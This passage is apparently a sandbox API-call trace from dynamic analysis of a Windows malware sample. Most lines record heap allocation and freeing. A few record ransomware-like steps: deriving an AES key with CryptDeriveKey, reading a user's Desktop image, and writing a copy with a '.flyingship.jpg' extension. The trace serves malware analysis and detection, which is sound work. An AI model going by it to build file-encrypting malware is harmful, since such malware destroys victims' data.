hHeap=0x650000) returned 1 [0076.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5d0 | out: hHeap=0x650000) returned 1 [0076.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df28 | out: hHeap=0x650000) returned 1 [0076.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3c0 | out: hHeap=0x650000) returned 1 [0076.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b168 | out: hHeap=0x650000) returned 1 [0076.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4c8 | out: hHeap=0x650000) returned 1 [0076.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb518 | out: hHeap=0x650000) returned 1 [0076.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68b480 | out: hHeap=0x650000) returned 1 [0076.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9768 | out: hHeap=0x650000) returned 1 [0076.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e060 | out: hHeap=0x650000) returned 1 [0076.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b198 | out: hHeap=0x650000) returned 1 [0076.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3f0 | out: hHeap=0x650000) returned 1 [0076.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ace8 | out: hHeap=0x650000) returned 1 [0076.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afd0 | out: hHeap=0x650000) returned 1 [0076.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0076.132] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e360 | out: hHeap=0x650000) returned 1 [0076.132] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b588 | out: hHeap=0x650000) returned 1 [0076.132] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0076.132] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df88 | out: hHeap=0x650000) returned 1 [0076.132] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e108 | out: hHeap=0x650000) returned 1 [0076.132] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e510 | out: hHeap=0x650000) returned 1 [0076.132] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aa30 | out: hHeap=0x650000) returned 1 [0076.132] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e030 | out: hHeap=0x650000) returned 1 [0076.132] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e390 | out: hHeap=0x650000) returned 1 [0076.132] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96e8 | out: hHeap=0x650000) returned 1 [0076.132] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x792010 | out: hHeap=0x650000) returned 1 [0076.132] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb538 | out: hHeap=0x650000) returned 1 [0076.132] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb478 | out: hHeap=0x650000) returned 1 [0076.132] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a1dd0 | out: hHeap=0x650000) returned 1 [0076.132] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0076.132] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0076.132] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb518 | out: hHeap=0x650000) returned 1 [0076.132] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96e8 | out: hHeap=0x650000) returned 1 [0076.132] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0076.132] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb478 | out: hHeap=0x650000) returned 1 [0076.132] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8ab8 | out: hHeap=0x650000) returned 1 [0076.132] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.132] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e90 | out: hHeap=0x650000) returned 1 [0076.132] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb518 | out: hHeap=0x650000) returned 1 [0076.132] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0076.132] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb518 | out: hHeap=0x650000) returned 1 [0076.132] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b588 | out: hHeap=0x650000) returned 1 [0076.132] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e030 | out: hHeap=0x650000) returned 1 [0076.132] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0076.132] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0076.132] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0076.133] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0076.133] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0076.133] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dcc0 | out: hHeap=0x650000) returned 1 [0076.133] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb518 | out: hHeap=0x650000) returned 1 [0076.133] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0076.133] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb518 | out: hHeap=0x650000) returned 1 [0076.133] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b588 | out: hHeap=0x650000) returned 1 [0076.133] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afd0 | out: hHeap=0x650000) returned 1 [0076.133] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0076.133] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0076.133] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0076.133] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0076.133] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df18 | out: hHeap=0x650000) returned 1 [0076.133] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0076.133] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0076.133] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0076.133] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0076.133] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0076.133] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.133] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6a8 | out: hHeap=0x650000) returned 1 [0076.133] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb518 | out: hHeap=0x650000) returned 1 [0076.133] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0076.133] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0076.133] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0076.133] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb518 | out: hHeap=0x650000) returned 1 [0076.133] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6a8 | out: hHeap=0x650000) returned 1 [0076.133] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb448 | out: hHeap=0x650000) returned 1 [0076.133] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6a8 | out: hHeap=0x650000) returned 1 [0076.133] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb518 | out: hHeap=0x650000) returned 1 [0076.133] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0076.133] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4a8 | out: hHeap=0x650000) returned 1 [0076.134] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0076.134] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb518 | out: hHeap=0x650000) returned 1 [0076.134] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6a8 | out: hHeap=0x650000) returned 1 [0076.134] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0076.134] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6a8 | out: hHeap=0x650000) returned 1 [0076.134] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb518 | out: hHeap=0x650000) returned 1 [0076.134] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0076.134] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0076.134] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0076.134] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb518 | out: hHeap=0x650000) returned 1 [0076.134] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6a8 | out: hHeap=0x650000) returned 1 [0076.134] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5a8 | out: hHeap=0x650000) returned 1 [0076.134] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0076.134] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x76ae80, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0076.134] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0076.134] GetProcAddress (hModule=0x77710000, lpProcName="CryptDeriveKey") returned 0x77753188 [0076.134] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6a8 | out: hHeap=0x650000) returned 1 [0076.134] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5a8 | out: hHeap=0x650000) returned 1 [0076.134] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5a8 | out: hHeap=0x650000) returned 1 [0076.134] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb518 | out: hHeap=0x650000) returned 1 [0076.134] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0076.134] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x650000) returned 1 [0076.134] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0076.134] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dcc0 | out: hHeap=0x650000) returned 1 [0076.134] CryptDeriveKey (in: hProv=0x6969c0, Algid=0x660e, hBaseData=0x6b89f8, dwFlags=0x1, phKey=0x61e2c0 | out: phKey=0x61e2c0*=0x6b8ab8) returned 1 [0076.134] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb458 [0076.134] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792010 [0076.134] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96e8 [0076.134] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6a8 [0076.135] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae80 [0076.135] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae68 [0076.135] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3b8 [0076.135] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae68 | out: hHeap=0x650000) returned 1 [0076.135] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0076.135] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0076.135] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae80 [0076.135] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae68 [0076.135] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e348 [0076.135] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3b8 [0076.135] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e348 | out: hHeap=0x650000) returned 1 [0076.135] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0076.135] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae68 | out: hHeap=0x650000) returned 1 [0076.135] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae68 [0076.135] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e348 [0076.135] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a970 [0076.135] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3b8 [0076.135] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0076.135] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0076.135] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e348 | out: hHeap=0x650000) returned 1 [0076.135] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e348 [0076.135] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a970 [0076.135] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad18 [0076.135] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3b8 [0076.135] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad18 | out: hHeap=0x650000) returned 1 [0076.135] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0076.135] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0076.135] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a970 [0076.136] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad18 [0076.136] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df40 [0076.136] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3b8 [0076.136] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df40 | out: hHeap=0x650000) returned 1 [0076.136] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0076.136] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad18 | out: hHeap=0x650000) returned 1 [0076.136] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad18 [0076.136] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df40 [0076.136] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b138 [0076.136] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3b8 [0076.136] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b138 | out: hHeap=0x650000) returned 1 [0076.136] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0076.136] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df40 | out: hHeap=0x650000) returned 1 [0076.136] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0076.136] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb448 | out: hHeap=0x650000) returned 1 [0076.136] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4a8 | out: hHeap=0x650000) returned 1 [0076.136] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0076.136] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0076.136] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df18 | out: hHeap=0x650000) returned 1 [0076.136] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfe8 | out: hHeap=0x650000) returned 1 [0076.136] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0076.136] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e390 | out: hHeap=0x650000) returned 1 [0076.136] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aa30 | out: hHeap=0x650000) returned 1 [0076.136] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e030 | out: hHeap=0x650000) returned 1 [0076.136] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e108 | out: hHeap=0x650000) returned 1 [0076.136] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e510 | out: hHeap=0x650000) returned 1 [0076.136] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e360 | out: hHeap=0x650000) returned 1 [0076.136] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df88 | out: hHeap=0x650000) returned 1 [0076.136] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0076.136] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ace8 | out: hHeap=0x650000) returned 1 [0076.136] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afd0 | out: hHeap=0x650000) returned 1 [0076.136] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3f0 | out: hHeap=0x650000) returned 1 [0076.137] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.137] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.137] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abb0 [0076.137] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb588 [0076.137] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb478 [0076.137] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e618 [0076.137] CryptDestroyHash (hHash=0x6b89f8) returned 1 [0076.137] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb398 [0076.137] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792238 [0076.137] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb528 [0076.137] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abb0 [0076.137] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e618 [0076.137] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad60 [0076.137] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb588 [0076.137] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6F5BQoLL3Uym0CamPlpJ.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6f5bqoll3uym0camplpj.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0076.137] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.137] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61e9f8 | out: lpNewFilePointer=0x0) returned 1 [0076.137] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0076.137] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6c0 [0076.137] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3d8 [0076.138] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.138] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb428 [0076.138] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a2060 [0076.138] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb468 [0076.138] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.138] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.138] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb428 [0076.138] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbf8 [0076.138] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abf8 [0076.138] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb468 [0076.138] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e558 [0076.139] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6F5BQoLL3Uym0CamPlpJ.flyingship.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6f5bqoll3uym0camplpj.flyingship.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0076.140] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68def0 [0076.140] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4f8 [0076.140] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3e8 [0076.140] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.140] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb428 [0076.140] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a2060 [0076.140] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb498 [0076.140] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.140] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.140] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8b78 [0076.140] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.140] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb428 [0076.140] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbf8 [0076.140] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab68 [0076.140] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb498 [0076.141] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61ea48 | out: lpNewFilePointer=0x0) returned 1 [0076.141] ReadFile (in: hFile=0x128, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61ea70, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61ea70*=0x10000, lpOverlapped=0x0) returned 1 [0076.143] ReadFile (in: hFile=0x128, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61ea70, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61ea70*=0x3eeb, lpOverlapped=0x0) returned 1 [0076.143] ReadFile (in: hFile=0x128, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61ea70, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61ea70*=0x0, lpOverlapped=0x0) returned 1 [0076.146] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.146] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb498 [0076.146] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbf8 [0076.146] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abf8 [0076.146] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0076.146] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0076.146] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x13eeb) returned 0x795ff8 [0076.146] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.146] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb498 [0076.146] RtlAllocateHeap (HeapHandle=0x650000, 